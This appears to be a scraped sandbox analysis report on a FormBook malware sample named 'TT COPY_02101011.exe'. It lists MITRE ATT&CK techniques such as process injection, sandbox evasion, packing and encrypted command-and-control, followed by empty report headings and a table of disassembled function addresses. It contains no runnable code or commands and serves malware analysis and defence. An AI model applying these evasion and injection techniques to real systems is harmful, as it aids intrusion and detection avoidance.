Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report TT COPY_02101011.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 004030E3, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 00405250, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 00405C49, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 00405C22, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403489, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C0B, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402E44, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174
fileCOMMON

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00404E07, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Function 00404618, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Function 0040411B, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266
stringCOMMON

Function 0040594D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00406043, Relevance: .3, Instructions: 334
COMMONCrypto